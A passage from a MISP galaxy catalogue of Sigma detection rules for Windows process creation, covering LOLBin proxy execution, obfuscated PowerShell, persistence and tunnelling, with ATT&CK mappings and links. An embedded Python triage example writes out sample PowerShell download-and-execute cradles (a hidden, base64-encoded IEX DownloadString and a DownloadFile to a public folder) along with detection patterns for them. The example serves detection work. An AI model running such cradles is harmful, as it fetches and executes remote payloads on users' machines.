https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml

Renamed PAExec Execution

Detects execution of a renamed version of PAExec, which is often used by attackers.

The tag is: misp-galaxy:sigma-rules="Renamed PAExec Execution"

Renamed PAExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 11003. Table References

Links

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.poweradmin.com/paexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml

Use of Remote.exe

Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.

The tag is: misp-galaxy:sigma-rules="Use of Remote.exe"

Use of Remote.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 11004. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/

https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml

Use of OpenConsole

Detects usage of the OpenConsole binary as a LOLBIN to launch other binaries and bypass application whitelisting.

The tag is: misp-galaxy:sigma-rules="Use of OpenConsole"

Use of OpenConsole has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11005. Table References

Links

https://twitter.com/nas_bench/status/1537563834478645252

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml

Ilasm Lolbin Use Compile C-Sharp

Detects use of Ilasm.exe to compile C# code into a DLL or EXE.

The tag is: misp-galaxy:sigma-rules="Ilasm Lolbin Use Compile C-Sharp"

Ilasm Lolbin Use Compile C-Sharp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 11006. Table References

Links

https://www.echotrail.io/insights/search/ilasm.exe

https://lolbas-project.github.io/lolbas/Binaries/Ilasm/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml

Suspicious MsiExec Embedding Parent

Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads.

The tag is: misp-galaxy:sigma-rules="Suspicious MsiExec Embedding Parent"

Suspicious MsiExec Embedding Parent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 11007. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml

HackTool - KrbRelay Execution

Detects the use of KrbRelay, a Kerberos relaying tool

The tag is: misp-galaxy:sigma-rules="HackTool - KrbRelay Execution"

HackTool - KrbRelay Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 11008. Table References

Links

https://github.com/cube0x0/KrbRelay

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelay.yml

Invoke-Obfuscation Via Stdin

Detects obfuscated PowerShell passed via stdin in scripts.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin"

Invoke-Obfuscation Via Stdin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11009. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml

Suspicious File Execution From Internet Hosted WebDav Share

Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content from it, as seen in malicious LNK files.

The tag is: misp-galaxy:sigma-rules="Suspicious File Execution From Internet Hosted WebDav Share"

Suspicious File Execution From Internet Hosted WebDav Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11010. Table References

Links

https://twitter.com/ShadowChasing1/status/1552595370961944576

https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml

Suspicious Userinit Child Process

Detects a suspicious child process of userinit

The tag is: misp-galaxy:sigma-rules="Suspicious Userinit Child Process"

Suspicious Userinit Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 11011. Table References

Links

https://twitter.com/SBousseaden/status/1139811587760562176

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml

HH.EXE Execution

Detects the execution of "hh.exe" to open ".chm" files.

The tag is: misp-galaxy:sigma-rules="HH.EXE Execution"

HH.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

Table 11012. Table References

Links

https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37

https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml

Potential Fake Instance Of Hxtsr.EXE Executed

HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of the Outlook apps and resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instance of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe.

The tag is: misp-galaxy:sigma-rules="Potential Fake Instance Of Hxtsr.EXE Executed"

Potential Fake Instance Of Hxtsr.EXE Executed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11013. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hxtsr_masquerading.yml

Port Forwarding Activity Via SSH.EXE

Detects port forwarding activity via SSH.exe

The tag is: misp-galaxy:sigma-rules="Port Forwarding Activity Via SSH.EXE"

Port Forwarding Activity Via SSH.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

Table 11014. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml

Suspicious Ping/Del Command Combination

Detects a method often used by ransomware, which combines "ping" to wait a couple of seconds and then "del" to delete the file in question. It is used, for example, to hide the file responsible for the initial infection.

The tag is: misp-galaxy:sigma-rules="Suspicious Ping/Del Command Combination"

Suspicious Ping/Del Command Combination has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 11016. Table References

Links

https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack

https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml

File Download with Headless Browser

Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files

The tag is: misp-galaxy:sigma-rules="File Download with Headless Browser"

File Download with Headless Browser has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11017. Table References

Links

https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html

https://twitter.com/mrd0x/status/1478234484881436672?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml

Persistence Via TypedPaths - CommandLine

Detects modification of or addition to the 'TypedPaths' key in the user or admin registry via the command line, which might indicate a persistence attempt.

The tag is: misp-galaxy:sigma-rules="Persistence Via TypedPaths - CommandLine"

Table 11018. Table References

Links

https://forensafe.com/blogs/typedpaths.html

https://twitter.com/dez_/status/1560101453150257154

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml

System Disk And Volume Reconnaissance Via Wmic.EXE

An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the wmic command-line utility and has been observed being used by threat actors such as Volt Typhoon.

The tag is: misp-galaxy:sigma-rules="System Disk And Volume Reconnaissance Via Wmic.EXE"

System Disk And Volume Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11019. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_volume.yml

Net WebClient Casing Anomalies

Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques

The tag is: misp-galaxy:sigma-rules="Net WebClient Casing Anomalies"

Net WebClient Casing Anomalies has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11020. Table References

Links

https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_webclient_casing.yml

Suspicious Chromium Browser Instance Executed With Custom Extension

Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension

The tag is: misp-galaxy:sigma-rules="Suspicious Chromium Browser Instance Executed With Custom Extension"

Suspicious Chromium Browser Instance Executed With Custom Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

Table 11021. Table References

Links

https://emkc.org/s/RJjuLa

https://redcanary.com/blog/chromeloader/

https://www.mandiant.com/resources/blog/lnk-between-browsers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml

Suspicious Process Start Locations

Detects suspicious processes run from unusual locations.

The tag is: misp-galaxy:sigma-rules="Suspicious Process Start Locations"

Suspicious Process Start Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11022. Table References

Links

https://car.mitre.org/wiki/CAR-2013-05-002

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_run_locations.yml

PUA - Chisel Tunneling Tool Execution

Detects usage of the Chisel tunneling tool via the commandline arguments

The tag is: misp-galaxy:sigma-rules="PUA - Chisel Tunneling Tool Execution"

PUA - Chisel Tunneling Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 11023. Table References

Links

https://github.com/jpillora/chisel/

https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/

https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_chisel.yml

Potential DLL Sideloading Via DeviceEnroller.EXE

Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via DeviceEnroller.EXE"

Potential DLL Sideloading Via DeviceEnroller.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 11024. Table References

Links

https://mobile.twitter.com/0gtweet/status/1564131230941122561

https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml

File Download And Execution Via IEExec.EXE

Detects execution of the IEExec utility to download and execute files

The tag is: misp-galaxy:sigma-rules="File Download And Execution Via IEExec.EXE"

File Download And Execution Via IEExec.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11025. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ieexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ieexec_download.yml

Potential Manage-bde.wsf Abuse To Proxy Execution

Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution

The tag is: misp-galaxy:sigma-rules="Potential Manage-bde.wsf Abuse To Proxy Execution"

Potential Manage-bde.wsf Abuse To Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 11026. Table References

Links

https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712

https://twitter.com/bohops/status/980659399495741441

https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md

https://twitter.com/JohnLaTwC/status/1223292479270600706

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml

ImagingDevices Unusual Parent/Child Processes

Detects unusual parent or child processes of ImagingDevices.exe (the Windows Imaging Devices control panel applet), as seen being used with Bumblebee activity

The tag is: misp-galaxy:sigma-rules="ImagingDevices Unusual Parent/Child Processes"

Table 11027. Table References

Links

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml

Execution of Suspicious File Type Extension

Detects whether the image specified in a process creation event doesn’t refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.

The tag is: misp-galaxy:sigma-rules="Execution of Suspicious File Type Extension"

Table 11028. Table References

Links

https://pentestlaboratories.com/2021/12/08/process-ghosting/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml

Potential Suspicious Mofcomp Execution

Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Mofcomp Execution"

Potential Suspicious Mofcomp Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11029. Table References

Links

https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml

CodePage Modification Via MODE.COM To Russian Language

Detects the use of the "mode.com" utility to switch the console code page to a Russian (Cyrillic) code page. This behavior has been used by the threat actors behind Dharma ransomware.

The tag is: misp-galaxy:sigma-rules="CodePage Modification Via MODE.COM To Russian Language"

CodePage Modification Via MODE.COM To Russian Language has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11030. Table References

Links

https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode

https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html

https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml

Malicious Windows Script Components File Execution by TAEF Detection

The Windows Test Authoring and Execution Framework (TAEF) allows you to run automation by executing test files written in different languages (C, C#, Microsoft COM scripting interfaces). Adversaries may execute malicious code (such as a WSC file containing VBScript, a DLL, and so on) directly by running te.exe.

The tag is: misp-galaxy:sigma-rules="Malicious Windows Script Components File Execution by TAEF Detection"

Malicious Windows Script Components File Execution by TAEF Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11031. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/

https://twitter.com/pabraeken/status/993298228840992768

https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml

Suspicious PowerShell Encoded Command Patterns

Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Encoded Command Patterns"

Suspicious PowerShell Encoded Command Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11032. Table References

Links

https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd_patterns.yml
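The two PowerShell rules above ("Net WebClient Casing Anomalies" and "Suspicious PowerShell Encoded Command Patterns") share one triage step that the one-line descriptions leave implicit: an -EncodedCommand payload is base64 of the UTF-16LE script, so it has to be decoded before any string pattern (including the casing check) can be applied to it. The following is an added example written for this page, not code from the Sigma project or from any of the referenced reports. The sample command lines are constructed, the allowlist of expected casings and the set of download-cradle indicators are this example's own assumptions, and the Sigma rules' exact conditions are not reproduced.

```python
import base64
import re


def _encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines for this example (not taken from any report on the page).
SAMPLES = {
    "obfuscated_encoded": "powershell.exe -nop -w hidden -enc " + _encode_ps(
        "$c = New-Object nEt.WEbCliEnT; IEX $c.DownloadString('http://example.invalid/stage1')"),
    "plain_cradle": "powershell -NoProfile -Command \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/a.exe','C:\\Users\\Public\\a.exe')\"",
    "benign": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the usual ones.
ENCODED_FLAG_RE = re.compile(
    r'(?<!\S)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)',
    re.IGNORECASE)
WEBCLIENT_RE = re.compile(r'net\.webclient', re.IGNORECASE)
# Casings a person or a legitimate script would plausibly type. Assumed allowlist for this
# example; anything else (nEt.WEbCliEnT, NeT.wEbClIeNt, ...) is reported as an anomaly.
EXPECTED_CASINGS = {"Net.WebClient", "net.webclient", "NET.WEBCLIENT"}
# Download-cradle indicators to look for in the decoded script (assumed set for this example).
CRADLE_RE = re.compile(
    r'downloadstring|downloadfile|downloaddata|invoke-expression|\biex\b'
    r'|invoke-webrequest|\biwr\b|start-bitstransfer', re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an -EncodedCommand payload, else None."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError: not base64, bad padding, ...
        return None
    return raw.decode("utf-16-le", errors="replace")


def webclient_casing_anomalies(text: str):
    """Every Net.WebClient occurrence whose exact casing is not in the expected set."""
    return [m.group(0) for m in WEBCLIENT_RE.finditer(text) if m.group(0) not in EXPECTED_CASINGS]


def cradle_indicators(text: str):
    return sorted({m.group(0).lower() for m in CRADLE_RE.finditer(text)})


def triage(cmdline: str) -> dict:
    """Decode first, then run the string checks over both the raw and the decoded text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "casing_anomalies": webclient_casing_anomalies(text),
        "cradle_indicators": cradle_indicators(text),
    }


def run_samples():
    return {name: triage(cmd) for name, cmd in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in run_samples().items():
        print(name, result)
```

The order matters: the casing rule fires on the decoded script, which a rule that only inspects the raw command line never sees. Conversely, a benign script that merely uses -ExecutionPolicy or -File is not mistaken for an encoded command, because the flag pattern requires whitespace after a valid -EncodedCommand prefix.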

7Zip Compressing Dump Files

Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

The tag is: misp-galaxy:sigma-rules="7Zip Compressing Dump Files"

7Zip Compressing Dump Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 11033. Table References

Links

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml

Change Default File Association To Executable Via Assoc

Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

The tag is: misp-galaxy:sigma-rules="Change Default File Association To Executable Via Assoc"

Change Default File Association To Executable Via Assoc has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"

Table 11034. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml

Mstsc.EXE Execution From Uncommon Parent

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

The tag is: misp-galaxy:sigma-rules="Mstsc.EXE Execution From Uncommon Parent"

Table 11035. Table References

Links

https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/

https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml

Regsvr32 Execution From Potential Suspicious Location

Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.

The tag is: misp-galaxy:sigma-rules="Regsvr32 Execution From Potential Suspicious Location"

Regsvr32 Execution From Potential Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 11036. Table References

Links

https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/

https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml

Potential SysInternals ProcDump Evasion

Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name

The tag is: misp-galaxy:sigma-rules="Potential SysInternals ProcDump Evasion"

Potential SysInternals ProcDump Evasion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 11038. Table References

Links

https://twitter.com/mrd0x/status/1480785527901204481

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml

Run PowerShell Script from ADS

Detects PowerShell script execution from Alternate Data Stream (ADS)

The tag is: misp-galaxy:sigma-rules="Run PowerShell Script from ADS"

Run PowerShell Script from ADS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 11039. Table References

Links

https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_ads.yml

Monitoring For Persistence Via BITS

BITS allows you to schedule a command to execute after a successful download, to notify you that the job is finished. When the job runs on the system, the command specified in the BITS job is executed. This can be abused by actors to create a backdoor on the system and for persistence: a BITS job is created to download malware or additional binaries and to execute the program once it has been downloaded.

The tag is: misp-galaxy:sigma-rules="Monitoring For Persistence Via BITS"

Monitoring For Persistence Via BITS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 11041. Table References

Links

http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-Part+1/15394

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml

Explorer Process Tree Break

Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"

The tag is: misp-galaxy:sigma-rules="Explorer Process Tree Break"

Explorer Process Tree Break has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11042. Table References

Links

https://twitter.com/bohops/status/1276357235954909188?s=12

https://twitter.com/CyberRaiju/status/1273597319322058752

https://twitter.com/nas_bench/status/1535322450858233858

https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml

Proxy Execution Via Explorer.exe

Detects the use of explorer.exe to proxy the execution of arbitrary commands or binaries, which attackers use to evade defense mechanisms

The tag is: misp-galaxy:sigma-rules="Proxy Execution Via Explorer.exe"

Proxy Execution Via Explorer.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11043. Table References

Links

https://twitter.com/CyberRaiju/status/1273597319322058752

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml

Netsh Allow Group Policy on Microsoft Defender Firewall

Detects the use of "netsh" to enable a Microsoft Defender Firewall rule group (for example the rule groups that allow SMB or RDP, as in the referenced Atomic Red Team test). Adversaries may modify system firewalls in order to bypass controls limiting network usage.

The tag is: misp-galaxy:sigma-rules="Netsh Allow Group Policy on Microsoft Defender Firewall"

Netsh Allow Group Policy on Microsoft Defender Firewall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11044. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall

https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml

Renamed Gpg.EXE Execution

Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.

